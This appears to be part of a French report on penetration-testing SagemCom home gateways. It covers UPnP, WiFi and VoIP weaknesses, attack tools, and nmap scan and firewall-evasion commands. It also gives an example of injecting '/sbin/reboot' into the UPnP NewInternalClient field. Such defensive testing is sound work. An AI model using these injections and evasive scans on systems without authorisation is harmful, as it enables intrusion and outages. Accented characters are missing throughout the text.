Le protocole UPnP comporte six phases fondamentales cites ci-dessous. Ces phases permettent un priphrique de sintgrer dans le rseau et de communiquer avec les autres priphriques. En effet, un priphrique UPnP doit passer tout dabord par les phases dadressage, de dcouverte et de description. Une fois la phase de description acheve, le priphrique UPnP entre dans les phases de contrle, de notification et de prsentation. Ces trois dernires phases qui sont indpendantes chronologiquement permettent aux diffrents quipements UPnP dexploiter les services offerts par les priphriques.

Profile UPnP
Un profil est un ensemble de paramtres et dactions qui peuvent former un modle de fonctionnement cohrent. Les profiles les plus connues sont :

Page 34

Chapitre 3
Internet Gateway Device (IGD). Audio/Video (A/V), basis for DLNA.

Etude de vulnrabilits des Terminaux Rsidentiels

Plusieurs profils UPnP contiennent des sous profils. Chaque sous profil inclut des actions et attribues. Ci-dessous un graphe qui prsente lhirarchie des profils les plus utiliss ainsi que les principales actions ddies chacun deux. [16]

Figure 15 Principaux profils UPnP et actions

2.2.

Risques et vulnrabilits

Les attaques UPnP visent la vulnrabilit du protocole qui nexige aucune authentification avant lexcution de quelques actions. Si lUPnP est activ, un utilisateur malveillant connect sur le rseau peut lancer des commandes malveillantes en utilisant quelques outils simples et la porte de tout le monde. (exemple : action ForceTermination() du profile WANIPConnection coupe la connexion vers le rseau WAN). La dfaillance majeure est dans laction AddPortMapping , plusieurs attaques peuvent tre ralises en se basant sur cette action, exactement sur lattribut NewInternelClient . AddPortMapping permet au client UPnP dajouter des rgles dans le TR afin dacheminer le trafic dsir vers une destination qui est souvent ladresse IP du client. Un utilisateur malveillant peut lutiliser afin de raliser ces attaques : Redirection du trafic vers une autre machine sur le rseau : cette approche consiste rediriger un trafic indsirable arrivant s ur un port X vers une autre adresse bien spcifique.

Page 35

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Figure 16 Redirection vers une autre adresse locale

Redirection du trafic vers ladresse local du TR : une telle opration permet un attaquant de raliser des attaques sur les services offert en local par le TR (ex : interface web).

Figure 17 Redirection vers l'adresse locale du TR

Page 36

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Redirection du trafic vers une adresse IP routable (WAN) : cette opration permet de raliser des attaques travers le TR.

Figure 18 Redirection vers une autre adresse WAN

Une autre attaque possible est lexcution dun code Shell sur les TRs bass sur Linux. Au lieu dune vraie adresse IP, lattaquant peut insrer un bout de code dans lattribue AddPortMapping qui va tre excut au sein du TR. Cette injection du code est trs limite et elle ne doit pas dpasser la taille dune adresse IP (15 caractres). On peut redmarrer le TR par une action AddPortMapping dont lattribue NewInternalClient = "/sbin/reboot" .

2.3.

Outils

Pour tester les services UPnP, il nous faut quelques outils de tests dont on cite : Sniffeur UPnP : pour capturer le trafic UPnP sur le rseau. Point de contrle UPnP : pour dtecter les priphriques UPnP et utiliser les actions quils fournissent. Intel Tools for UPnP Technologie est un ensemble complet doutils ddi pour les systmes dexploitation Windows permettant de tester lUPnP. Il inclut les outils suivants : Intel Device Spy. Intel AV Media Controller. Intel Device Sniffer.

Page 37

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Dans le monde du libre, on trouve un outil similaire Intel Tools . GUPnP et UPnP Inspector . Ces outils offrent une interface graphique et assure la dcouverte des priphriques UPnP et le test les diffrentes actions possibles.

3. Module WIFI
3.1. Prsentation

Comme il est indiqu dans le premier chapitre, Les TRs SagemCom offrent la possibilit dinterconnecter les priphriques sans fil via le WIFI. Lmission des ondes radio ne peut pas tre limite dans un primtre restreint pour viter linterception indsirable des donnes par un tiers. Plusieurs techniques et approches sont mises en place pour assurer la protection des communications entre les diffrents quipements dun mme rseau : Chiffrement des donnes : les deux techniques connues sont WEP et WPA. o Le WEP, Wired Equivalent Privacy est un protocole permettant de scuriser les rseaux sans fil de type Wifi. Ces rseaux diffusant les messages changs par ondes radiolectriques, sont particulirement sensibles aux coutes clandestines. Le WEP tient son nom du fait qu'il devait fournir aux rseaux sans fil une confidentialit comparable celle d'un rseau local filaire classique. Cependant, plusieurs vulnrabilits ont t identifies dans ce protocole, qui lui rend pratiquement inutilisable aujourdhui. o Le WPA, Wi-Fi Protected Access est un mcanisme permettant aussi de scuriser les rseaux sans fil de type Wifi. Il a t cr en rponse aux nombreuses et svres faiblesses que des chercheurs ont trouves dans le mcanisme prcdent, le WEP. Il prsente deux modes savoir : WPA personnel (WPA-Personal) : connu galement sous le nom de mode secret partag ou WPA-PSK (Pre-shared key). Chaque quipement du rseau sans fil s'authentifie auprs du point d'accs en utilisant la mme cl sur 256 bits. WPA entreprise (WPA-Enterprise) : connu galement sous le nom de mode WPA-802.1X ou WPA-EAP, WPA entreprise est conu pour les rseaux d'entreprise et demande ce que l'on utilise un serveur d'authentification RADIUS. Filtrage MAC : cette mthode peut tre combine avec le chiffrement des donnes transmises afin dajouter un niveau de scurit dfinissant la liste des quipements autoriss par adresse MAC.

Page 38

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Autre mthodes et pratiques comme le changement des paramtres par dfaut, (exemple : cl wifi fournit par dfaut de fournisseur, ladresse rseau par dfaut, )

3.2.

Risques et vulnrabilits

Les risques lis la mauvaise scurisation des rseaux sans fil sont [17]: L'interception de donnes qui consiste couter les transmissions des diffrents utilisateurs du rseau sans fil. Le dtournement de connexion qui a comme but lobtention d'accs un rseau local ou internet. Le brouillage des transmissions qui consiste mettre des signaux radio de telle manire produire des interfrences. Les dnis de service qui rend le rseau inutilisable en envoyant des commandes factices.

Craquage de cl chiffrement
Plusieurs mthodes peuvent tre utiles pour effectuer cette attaque. Avec un rseau sans fil protg par une cl WEP, un utilisateur peut le craquer facilement puisque le cryptage WEP utilise le chiffrement RC49 et le vecteur dinitialisation IV qui est transmit en claire sur le rseau. Ces deux composants rendent le protocole WEP sensible une attaque par cl apparente 10. La dure de cette attaque varie en fonction du taux des donnes transfres. Pour le WPA/WPA2 ce type dattaque est presque impossible. Dans le mode Pre Shared Key (WPA/WPA2 Personnel), la phrase de chiffrement peut contenir de 8 63 caractres ASCII. En plus de a le WPA utilise le protocole de chiffrement TKIP11 qui sert changer la cl de chiffrement dynamiquement (WPA2 utilise CCMP12). Pour craquer la cl, il faut utiliser une attaque dictionnaire. Le sniffer doit dtecter la phase dauthentification dun client (the Four-Way Handshake13). Si la vraie cl nexiste pas dans le dictionnaire, il est impossible de la craquer.

RC4 : RC4 est un algorithme de chiffrement flot conu en 1987 par Ronald Rivest, l'un des inventeurs du RSA, pour les Laboratoires RSA. Il est support par diffrentes normes, par exemple dans SSL ou encore WEP. 10 Attaque par cl apparente : Une attaque par cl apparente est une forme de cryptanalyse o l'adversaire peut observer les oprations d'un algorithme de chiffrement lorsqu'il est utilis avec diffrentes cls, aux valeurs inconnues, mais qui sont lies entre elles par des proprits mathmatiques connues de l'attaquant. 11 TKIP : (Temporal Key Integrity Protocol) est un protocole de communication utilis pour la protection et l'authentification des donnes transitant sur un rseau Wifi. 12 CCMP : (Counter-Mode/CBC-Mac protocol) est une mthode de chiffrement dfinie dans le standard IEEE 802.11i. 13 Four-Way Handshake : Phase dauthentification dans le WPA2, elle consiste la drivation et l'change des clefs unicast/multicast partir de la clef PMK (Pairwise Master Key).

Page 39

Chapitre 3 Autre attaque

Etude de vulnrabilits des Terminaux Rsidentiels

Les cls WIFI par dfaut sont gnres par le constructeur. Elles sont gnralement gnres partir du SSID et ladresse MAC du TR. Certain pirate informatique ont russit dterminer lalgorithme pour gnrer la cl.

3.3.

Outils

Il existe une gamme doutils complte pour tester la scurit du rseau WIFI. Aircrack propose un ensemble doutils permettant principalement laudit de la scurit du WIFI ainsi que plein dautres fonctionnalits comme linjection des paquets, snif du rseau, craquage de cls de chiffrement, etc. La suite AirCrack-NG contient les outils suivants : aircrack-ng : casseur de cls WEP statiques et WPA-PSK (Nouveau type de casseur: PTW14) airdecap-ng : dcrypteur de fichiers WEP/WPA capturs airdriver-ng : permet de patcher les drivers, par exemple pour le cas du rtl8187 15, qui est utile pour faire l'injection de paquet aireplay-ng : programme d'injection de paquets 802.11 (disponible sous Linux et FreeBSD seulement) airmon-ng : permet d'activer/dsactiver le mode moniteur d'une carte wifi. Avec ce mode la carte wifi se place en "observateur" du rseau. airodump-ng : programme de capture de paquets 802.11. airolib-ng : utile pour le bruteforce de clef WPA. Il permet de crer une base de donnes contenant vos fichiers dictionnaire pour un ou plusieurs SSID. Le crack est trs rapide avec cette mthode, cependant la cration de la base de donnes est couteuse en terme de temps. airserv-ng : permet de lancer une machine avec une interface en mode moniteur, et l'utiliser depuis une autre machine avec la suite aircrack-ng, en spcifiant l'adresse IP et le port. airtun-ng : programme pour la cration d'une interface virtuelle. easside-ng : permet de communiquer un point d'accs en WEP sans connatre la cl. packetforge-ng : permet de forger des paquets ARP, UDP, ICMP ou personnaliss. wesside-ng : Crack automatiquement une clef WEP en essayant toutes les attaques.

14 15

PTW : Amlioration de lancienne mthode de craquage de cl WEP, dvelopp par Aircrack. rtl8187 : Pilotes pour les cartes rseaux Wifi sous Linux.

Page 40

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

4. Module VoIP
4.1. Prsentation

La Voix sur IP ou tlphonie IP permet la transmission de la voix dans le rseau IP. Par VoIP, nous dsignons aussi tlphonie par Internet. Parmi ses mcanismes on peut distinguer deux catgories Systmes ferms / propritaires Systmes ouverts / libres. Dans la premire catgorie, nous trouvons par exemple le logiciel de la tlphonie applicative Skype ou Messenger. La seconde catgorie englobe les protocoles ouverts bass sur SIP, H.323 et IAX2. Avec la voix sur IP, les appels tlphoniques sont effectus par lintermdiaire de la connexion Internet. Pour ce faire, cette technologie convertit les signaux analogiques de la voix en signaux numriques; elle les dcoupe, les compresse, les code, les numrise, puis envoie ces paquets dans le rseau internet. La course la rduction des cots dune entreprise implique bien souvent la migration du service de tlphonie vers la Voix sur IP. Ce choix sduit par le retour sur investissements des communications. Cependant de nombreux paramtres sont bien souvent oublis ou ignors. Avant de franchir le pas, il est ncessaire dtudier les nouvelles contraintes engendres. Mis part la surcharge du rseau de lentreprise et la migration de nombreux quipements, la confidentialit des communications et lefficacit des plans de secours sont remis en cause. La convergence numrique va introduire de nouveaux services et par consquent, de nouvelles vulnrabilits et de nouveaux vecteurs dattaques. [18]

4.2.
protocoles :

Protocole VoIP

Avec lvolution du VoIP, plusieurs protocoles et standards ont apparu. Il y a deux types de

Protocoles de signalisations : Protocoles de transmission de voix :

Dans ce qui suit on va prsenter le protocole SIP qui est utilis par les TRs SagemCom. SIP est un protocole de signalisation appartenant la couche application du modle OSI. Son rle est d'ouvrir, modifier et librer les sessions. L'ouverture de ces sessions permet de raliser de l'audio ou vidoconfrence, de l'enseignement distance, de la voix (tlphonie) et de la diffusion multimdia sur IP essentiellement. [19]

Page 41

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Le protocole SIP utilise le port 5060 TCP ou UDP pour la signalisation et le port 5061 TCP ou UDP pour la signalisation crypt de la voix. Le SIP intervient dans les diffrentes phases de communication entre deux entits : Localisation du terminal correspondant. Analyse du profil et des ressources du destinataire. Ngociation du type de mdia (voix, vido, donnes...) et des paramtres de communication, Disponibilit du correspondant, dtermine si le poste appel souhaite communiquer, et autorise l'appelant le contacter. Etablissement et suivi de l'appel, avertit les parties appelant et appel de la demande d'ouverture de session, gestion du transfert et de la fermeture des appels. Gestion de fonctions volues : cryptage, retour d'erreurs, ... Les communications SIP se font lintermdiaire des requtes, chaque requte reue une rponse est envoye caractrise par un code et un motif. Ci-dessous un tableau descriptif des diffrentes requtes et rponses.
Requtes Cancel Register Ack Invite Bye Options Notify Refer Prack Info Message Subscribe Update Description Annulation d'une requte en cours. Mthode d'enregistrement permettant un agent (UA-User Agent) de communiquer son adresse IP et l'URL o le joindre. Mthode servant accuser la rception d'autres requtes. Mthode utilise pour tablir des sessions de communication entre agents. Terminaison d'une session de communication entre agents. Requte permettant d'obtenir les informations relatives aux capacits d'un correspondant, sans pour autant tablir d'appel. Requte de notification d'un vnement conscutif une requte d'abonnement Requte de redirection d'un appel vers un autre agent Requte de scurisation des rponses provisoires Requte d'information sur la session en cours Requte d'envoi de messages instantans Requte d'abonnement aux vnements d'un autre agent identifi par son URI Requte de modification d'une session en cours d'tablissement
Tableau 7 Requtes SIP

Rponses Provisional (1xx) Success (2xx) Redirection (3xx) Client Error (4xx) Server Error (5xx) Global Failure (6xx)

Description Requtes reues et en cours de traitement La requte a t bien reue, comprise et accepte D'autres actions sont ncessaires (par le demandeur) pour mener bien la requte La requte comprend des erreurs et ne peut tre traite en l'tat Le serveur a chou dans le traitement d'une requte priori valide La requte ne peut pas tre traite par aucun serveur
Tableau 8 Codes de rponses SIP

Page 42

Chapitre 3 Syntaxe SIP :

Etude de vulnrabilits des Terminaux Rsidentiels

Similaire au http, le protocole SIP utilise le mode requte/rponse. Il indique la mthode suivie de lidentifient (URI). La fin de la ligne est rserve la version du SIP.
INVITE sip:201@192.168.1.104 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar Max-Forwards: 70 To: 201@192.168.1.104

Appel entre deux entitss :


lappelant INVITE. Lappel Lappel retourne retourne une rponse envoie une requte

TRYING-100. une rponse

RINGRING-180 pour la tonalit. Lappel retourne une rponse OK200. Lappelant envoi une rponse ACK et la conversation lappelant commence. accroche le (RTP16 DATA) Quand

tlphone une requte BYE est envoye. Lappel retourne une rponse OK.
Figure 19 Exemple d'appel

4.3.

Risques et vulnrabilits

Malgr les avantages du VoIP, la migration vers une telle technologie a des inconvnients majeurs. Lutilisation de cette technologie sur le rseau prsente des risques majeurs qui touchent plusieurs axes [20].

Attaque physique
Limplmentation da la norme 802.3af17 ne prsente pas que davantage car lexposition des quipements la port des utilisateurs malveillants ou leur interface dadministration peuvent

16

RTP : Real-Time Transport Protocol, est un protocole de communication informatique se positionnant au niveau 4 (Couche transport) du Modle OSI. RTP utilis avantageusement sur un rseau temps rel. 17 802.3af : Le Power over Ethernet (ou norme IEEE 802.3af) permet de faire passer une tension de 48 V (jusqu' 12 W de puissance voire plus) en plus des donnes 100 Mbit/s ou 1 Gbit/s.

Page 43

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

provoquer des dgts normes qui peuvent aller dun simple dni de service via la coupure dalimentation jusqu la dgradation de la qualit de service pour tous les quipements.

Attaque rseau
Le rseau VoIP utilise la mme infrastructure que le rseau DATA, ce qui lui rend expos aux mmes problmes. Ci-dessous, on cite quelque risque : Malgr que la tlphonie ne ncessite quune bande passante rduite, elle requiert un dbit constant. Ce qui lui rend sensible des attaques de type dni de service ou de congestion du rseau. Ces types dattaques peuvent tre raliss en forgeant des paquets malicieux dans le rseau. Lcoute passive du rseau qui peut tre un point critique car elle touche la confidentialit des communications. Cette attaque permet un pirate de rcuprer des informations confidentielles (par exemple numro du compte bancaire). Il y a dautres attaques sur les protocoles VoIP. Comme le spoofing SIP qui sert usurper lidentit dun utilisateur afin de raliser des appels gratuits ou envoyer des messages bien spcifiques pour perturber les communications tablies.

Attaque applicative
Les risques peuvent dpasser le primtre du rseau pour toucher laspect applicatif. Les logiciels utiliss pour le VoIP peuvent tre une cible pour les pirates afin de gagner laccs au serveur quil les hberge.

4.4.

Outils

Vu que le VoIP est la tendance actuelle dans le monde de la tlphonie, plusieurs organisations se sont occupes de la scurit de ce type de service. On cite par exemple VOIPSA (Voice over IP Security Alliance) qui essaye de remplir le vide dans ce domaine. Une tude a t effectue par VOIPSA dans le but de dgager une liste complte des outils ncessaires pour tester la scurit du VoIP. Dans ce qui suit on va citer quelques outils classifi par catgorie : Sniffing tools : cette catgorie inclut les outils qui servent capturer et analyser le trafic afin de dterminer les conversations VoIP actives sur le rseau. (Wireshark, PSIPDump, VoIPong, UCSniff, rtpBreak, etc) Scanning and Enumeration tools : cette catgorie inclut les outils ncessaires pour dterminer lexsitance du service VoIP, numro du port, liste des login et utilisateurs, (Nessus, nmap, enumIAX, iaxscan, SIPSCAN, SCTPScan, etc) Flooding tools : cette catgorie inclut les gnrateurs des paquets et du trafic afin du perturber les connexions actives et empecher les nouvelles demandes de connexion. (IAXFlooder, INVITEFlooder, kphone-ddos, RTP Flooder, Scapy, etc)

Page 44

Chapitre 3

Etude de vulnrabilits des Terminaux Rsidentiels

Fuzzing tools : cette catgorie inclut les outils qui servent gnrer des paquets VoIP (SIP ou autre protocole) malforms pour tester le service VoIP (Fuzzy packet, InterState Fuzzer, Protos, Sip Proxy, VoIPer, etc)

Signaling attacking tools : cette catgorie inclut les outils qui permettent de manipuler la signalisation entre deux entits ; toutes les attaques lis aux protocoles de signalisation. (Bye Teardown, VoIPHopper, vnak, etc)

Media attacking tools : cette catgorie inclut les outils qui permettent de manipuler la les donnes transfres lors dune communication entre deux entits ; toutes les attaques lis aux protocoles de media (transfert de la voix, etc. (RTP InsertSound, RTPInject, SteganRTP, etc)

La plupart des outils cits ci-dessus sont prsents dans Backtrack.

Conclusion
Dans ce troisime chapitre, pilier central de notre tude, on a pu prsenter les diffrents modules du TR, les risques qui peuvent les menacer et les outils possibles pour tester leur scurit. Cette approche modulaire, entre dans le cadre de la stratgie adopte afin de couvrir convenablement la question de la scurit des passerelles rsidentielles ; approche, qui nous permettra, en plus deffectuer des tests de pntration modulaires, de pouvoir bnficier de la possibilit de rutiliser certains concepts issus dun module sur un autre. Le chapitre suivant, explicitera alors, les attaques quon va raliser et les scnarios quon va adopter pour dgager le plan de test final essentiel la mise lpreuve scuritaire des passerelles.

Page 45

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Maintenant que nous avons prsent les diffrents modules dun terminal SagemCom, en spcifiant les risques et les dfaillances qui peuvent le menacer, il ne reste qu mettre en place une plateforme de tests ainsi quun plan de tests pour couvrir les scnarios envisageables et toucher toutes les fonctionnalits de la passerelle (accs rseau, WiFi, UPnP, VoIP, IHM, etc). Dans ce chapitre, nous commencerons par la prsentation de lenvironnement de test ; OS, architecture, quipements, etc. Ensuite, nous allons suivre la dmarche modulaire, tablie au chapitre prcdent, pour dfinir et mettre en place les scnarios de tests de scurit possibles pour chaque module tudi. Nous terminerons par un tableau rcapitulatif des diffrents cas de tests mis en uvre (Voir Annexe 1 et Annexe 2).

Page 46

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

1. Environnement de test
1.1. Environnement matriel

Avant dentamer les tests, il faut dabord prparer la plateforme ncessaire. Dans lensemble des tests nous avons besoin de ces quipements: Des PCs. o o Pour certains tests de stress on a besoin de plus quune machine. Pour certains outils qui ncessitent une configuration matrielle prcise.

Un TR SagemCom fonctionnel sur lequel les services tester doivent tre activs. Des tlphones IP. Cartes rseaux Wifi. Connexion et accs WAN et LAN.

Dans les tests raliser nous avons besoin de diffrents systmes dexploitation. Il existe certains outils qui ncessitent un systme bien dfini18 (Linux, Windows, etc).

1.2.

Environnement logiciel

1.2.1. Les systmes dexploitation ddis scurit


Sur le march on trouve plusieurs systmes dexploitations orients scurit, ils servent regrouper le plus grand nombre doutils de scurit dans un seul systme pour simplifier la tche des experts scurit et leurs faire gagner du temps dans linstallation et la configuration des outils. La plupart de ces systmes sont des distributions Linux personnalises. Ci-dessous, la liste des distributions les plus connues : Matriux BlackUbuntu Ubuntutrinux Vacarm Linux Samurai Web Testing Framework BackTrack La plupart de ces distributions se ressemblent (sauf pour Samurai spcialis dans la scurit des applications web).

18

On peut utiliser des applications Windows sur un systme linux et vice-versa avec lutilisation des logiciels comme Wine sur Linux et CygWin sur Windows.

Page 47

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

1.2.2. Choix du systme dexploitation le plus adquat


Le seul critre de choix est la popularit et le nombre dutilisateurs dans le monde. Les dveloppeurs de BackTrack ont russi faire de cette distribution la plus connue dans le domaine du pentesting laide de la communaut (anglaise, franaise, italienne, allemande, espagnole et brsilienne) et la mise en place de plusieurs certifications dans les diffrents domaine de la scurit informatique en se basant sur leur produit 19. Dans ce qui suit, nous prsentons la distribution linux BackTrack et larchitecture rseau de la plateforme de test.

Figure 20 Logo BackTrack

BackTrack est une distribution linux oriente scurit, son but est de regrouper les outils ncessaires et utiles pour tester la scurit dun systme rseau. Bas sur Slackware jusqu la version 3 et Ubuntu dans les versions ultrieures et marg sa richesse en terme doutils, BackTrack offre un environnement trs extensible et personnalisable ; installation de nos propres outils si ncessaire, lajout dautre outils, configuration et personnalisation des outils, etc. La version actuelle de BackTrack est BackTrack 5 R1 sortie le 11 aot 2011 et base sur Ubuntu 10.04 . Les outils de tests sont classs par catgorie (Voir figure 21); collecte dinformations, valuation des vulnrabilits, outils dexploitation, investigations, etc. Sous chaque catgorie, les outils sont classs par le type des cibles (architecture rseau, systme, base de donnes, serveur web, applications, etc) [21].

19

Offensive Security offre plusieurs certifications OSCP (Offensive Security Certified Professional), OSCE (Offensive Security Certified Expert) et OSWP (Offensive Security Wireless Professional).

Page 48

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 21 Menu BackTrack

1.3.

Architecture rseau de la plateforme de tests

Larchitecture rseau de la plateforme de test en gnral est compose dun client WIFI (PC quip dun dongle WIFI), un TR et un tlphone IP. Pour la connectivit, nous avons besoin dune connexion internet afin de raliser des tests depuis le LAN et le WAN.

Figure 22 Architecture rseau de la plateforme de test

Page 49

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Larchitecture prsente ci-dessus est trs gnrique. Certains scnarios ncessitent une architecture bien prcise tels que : - Dans le cas des tests de stress, nous avons gnralement besoin de plusieurs PCs. - Dans le cas des tests VoIP, nous avons besoin dune communication active entre deux tlphones IP. Dans ce qui suit, nous dfinissons les diffrents tests possibles raliser en suivant la mme dmarche du chapitre prcdent. Pour chaque module tudi nous commenons par la dfinition des diffrents tests possibles raliser. Par la suite, chaque test sera accompagn dune description de son objectif, des outils ncessaires et des tapes de son droulement.

2. Module rseau
2.1. Scan des ports, services et OS

Dans le chapitre prcdent, nous avons parl des diffrents types de scan des ports et nous avons list quelques outils ncessaires pour le droulement des tests. Ci-dessous la liste des tests raliser pour ce sous module : Test1 : scan des ports (connaitre ltat des ports) Test2 : scan des services (connaitre les noms de services et leur versions) Test3 : dtection dOS (dtecter le systme dexploitations des TRs)

2.1.1. Outils de tests


Loutil le plus adquat dans notre cas est Nmap . Ce dernier permet la ralisation des diffrents types de scan des ports et assure la dtection de services et dOS. Un autre avantage du nmap est la possibilit de crer des scripts personnaliss afin dautomatiser des tches, par exemple script de dtection et exploitation des vulnrabilits, dtection des versions, etc. Afin de simplifier la tche et de fournir des rsultats clairs, nous utilisons Zenmap , linterface graphique du nmap . Il fournit plusieurs profils prdfinis de scan o chaque profil est caractris par une commande nmap et une suite doptions permettant la ralisation dun type de scan spcifique. Sinon il est possible de crer un nouveau profil (Voir figure 23). dcouverte du rseau, amlioration de la

Page 50

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 23 Profil Zenmap

2.1.2. Tests raliss


Test1 : scan des ports
Vu le grand nombre des services et de fonctionnalits offertes par les TRs SagemCom, un grand nombre de ports doit tre ouvert pour assurer le bon fonctionnement de ces services. Le test a pour but de: Vrifier si la spcification du client est bien respecte ou pas. Certains clients demandent une configuration bien prcise concernant louverture et la fermeture de ports. Vrifier si les ports ouverts pour des besoins lors de la validation du produit sont de nouveau ferms ou non. Dterminer les ports ouverts pour la phase collecte dinformation du pentesting. Dterminer ltat du pare-feu et son fonctionnement. Dans la partie suivante, nous prsentons les diffrents scnarios et scans [12].

Scnario 1 : TCP Scan


Ce type de scan est viter car il est facilement dtectable par le pare-feu sil existe et laisse une trace dans les logs du TR. Vu que nous somme dans la phase de test et validation, il faut bien vrifier que le firewall est bien configur. Avec nmap il faut utiliser la commande suivante :
nmap -p 1-65535 -sT -T4 -v 192.168.1.1

-p : les ports scanner. -T4 : vitesse de scan [22]. -v : mode verbeuse qui affiche en temps rel lexcution de scan et gnre plus dinformation.

Page 51

Chapitre 4 Remarque :

Mise en place dune solution de tests de scurit des TRs

Nous pouvons choisir un ou plusieurs ports mais dans notre cas il est prfrable de tester tous les ports car le TR peut utiliser des ports non standards pour certains services bien spcifiques. Sous nmap plusieurs options entrent en jeu dans la configuration de la vitesse du scan (exemple : --max-rtt-timeout --initial-rtt-timeout --max-retries), loption -T simplifie cette tche en offrant plusieurs mode de scan. Loption -Tx avec x peut varier de 0 5 :
o o o o

Paranoid (0) : Envoi d'un paquet toutes les 5 minutes. Sneaky (1) : Envoi d'un paquet toutes les 15 secondes. Polite (2) : Envoi d'un paquet toutes les 0.4 secondes. Normal (3) : Niveau par dfaut. Optimise la dure du scan en en minimisant sa dure sans perte de paquet.

Aggressive (4) : Attente d'une rponse pendant un maximum de 1.25 secondes au maximum.

Insane (5) : Attente d'une rponse pendant un maximum de 0.3 secondes.

Scnario 2 : Syn Scan


Connu aussi par le nom de stealth Scan , ce scnario a pour but principal de dterminer ltat des ports dans la cible. Le but de ce scnario est de lister les ports ouverts.
nmap -p 1-65535 -sS -T4 -v 192.168.1.1

-sS : Syn scan

Remarque :
Le Syn Scan est caractris par sa vitesse puisquil peut balayer des milliers de ports par seconde.

Scnario 3 : UDP Scan


Les deux autres scans sont destins pour vrifier ltat des ports en mode TCP, lUDP est ncessaires pour savoir sil y a des services qui utilisent le protocole UDP.
nmap -p 1-65535 -sU -T4 -v 192.168.1.1

sU : UDP Scan.

Remarque
le scan UDP est trs lent par rapport au SYN Scan. Pour un rseau local il peut dpasser les deux heures. Si les scans lists ci-dessus naboutissent pas des rsultats clairs, autrement dit le pare-feu utilis par les TRs SagemCom rsiste ces types des scans, nous pouvons alors penser utiliser autre type de scan pour vrifier si le port en question est filtr ou pas comme :

Page 52

Chapitre 4
ACK Scan :

Mise en place dune solution de tests de scurit des TRs

nmap -p 1-65535 -sA -T4 -v 192.168.1.1

X-mas Scan :

nmap -p 1-65535 -sX -T4 -v 192.168.1.1

FIN Scan :

nmap -p 1-65535 -sF -T4 -v 192.168.1.1

Null Scan :

nmap -p 1-65535 -sN -T4 -v 192.168.1.1

Remarque :
Dans les manipulations ralises, nous choisissons de faire les scans sur tous les ports afin de dterminer : o o Si un ou plusieurs ports sont ouverts sans besoin. Si un service ou plusieurs services connus tournent sur un port non standard.

Nous pouvons minimiser le temps de scan en spcifiant les numros des ports scanner, ce type du scnario est conseill pour le UDP Scan vu quil est le plus lent des scans. Nous pouvons fixer les numros des ports ou utiliser Nmap par dfaut 20.

nmap -p 20,21,53,67,80,443 -sS -T4 -v 192.168.1.1

Scnario 4 : technique dvasion


Nous pouvons utiliser plusieurs techniques dvasions dont nous citons quelques une : Utilisation des ports source autoriss car certains pare-feu bloquent les requtes partir des ports non autoriss:
nmap -g 20 -p 20,21 -sS -T4 -v 192.168.1.1

-g : le numro du port source (exemple : 5060 pour le protocole SIP) Fragmentation des paquets 21:

nmap -g 20 -f 5 -p 20,21 -sS -T4 -v 192.168.1.1

-f : dfinir le nombre de fragments envoyer. Nous pouvons utiliser loption --mtu pour dfinir le taille des paquets.
20 21

Nmap scan 1000 ports des services les plus connues si les ports destination ne sont pas spcifis. Certain pare-feu et systme de dtection dintrusion (IDS) ne peuvent pas dtecter les paquets fragments

Page 53

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Prsentation des rsultats du scan


Zenmap prsente les rsultats de scan dune faon claire en mettant en vidence les informations importantes (Voir figure 25).

Figure 24 Rsultat dun simple scan des ports et services

Test2 : scan des services


En se basant sur les rsultats du premier test, nous essayons de dterminer le nom et la version des services tournant sur le TR. Comme prvu, il existe certains service qui tournent sur un port non standard. Avec Nmap, nous lanons cette commande :
nmap -p 20,21 -sV -v 192.168.1.1

-sV : Dtection des services.

Remarque :
Il existe plusieurs autres options offertes par nmap pour la dtection des services comme loption --version-intensity <intensity> . La valeur d'intensit doit tre comprise entre 0 et 9, la valeur par dfaut tant le 7. La dtection des services nest pas toujours efficace, surtout si la cible est un quipement rseaux contrairement aux serveurs et aux PCs car les services des TRs sont spcifiques. Pour les versions des services non reconnus, Nmap gnre une signature de service afin de contribuer et amliorer la base de donnes des services utilise par Nmap (Voir Figure 25).

Page 54

Chapitre 4 Test3 : dtection dOS

Mise en place dune solution de tests de scurit des TRs

La dtection dOS est importante pour les tapes qui suivent dans le pentesting. Les rsultats de ce test et du test 2 nous aident acheminer notre recherche dans les failles et les vulnrabilits possibles sur les TRs car il est inutile de tester des attaques et des exploits sur des services sans connaitre lOS. Les attaques sont gnralement ddies pour un systme dexploitation bien dfini. La commande permettant la dtection dOS sous Nmap est :
nmap -O -v 192.168.1.1

-O : dtection dOS.

Remarque :
La dtection dOS nest efficace que sil existe au moins un port ouvert et un autre ferm sur le systme scann. Loption --osscan-limit ne permet la dtection dOS que si le critre cidessus nest prsent. Dans certain cas, Nmap narrive pas dtecter lOS exacte de la cible, pour cela il offre loption--osscan-guess ou --fuzzy pour gnrer plusieurs possibilits avec des pourcentages de certitude (Voir figure 25).

Figure 25 Exemple dtection d'OS

2.1.3. Profils de scan Zenmap


Les tests dcrits ci-dessus ont pour but dviter le gaspillage de temps car chaque test aboutie un rsultat spcifique. Nous pouvons combiner tous ces types de scan dans un seul en utilisant les profils de scan Zenmap :

Page 55

Chapitre 4 Intense scan, all TCP ports:

Mise en place dune solution de tests de scurit des TRs

nmap -p 1-65535 -T4 -A -v 192.168.1.1

-p : les ports scanner. -T4 : Timing (0-5), Faster execution. -A : Scan agressif, dtection du systme dexploitation et les versions des services, script scanning et traceroute. -v : mode Verbose .

Intense scan plus UDP:


nmap -sS -sU -T4 -A -v 192.168.1.1

-sS : TCP SYN Scan -sU : UDP Scan -T4 : Timing (0-5), Faster execution. -A : Scan agressif, dtection du systme dexploitation et les versions des services, script scanning et traceroute.

Slow comprehensive scan :


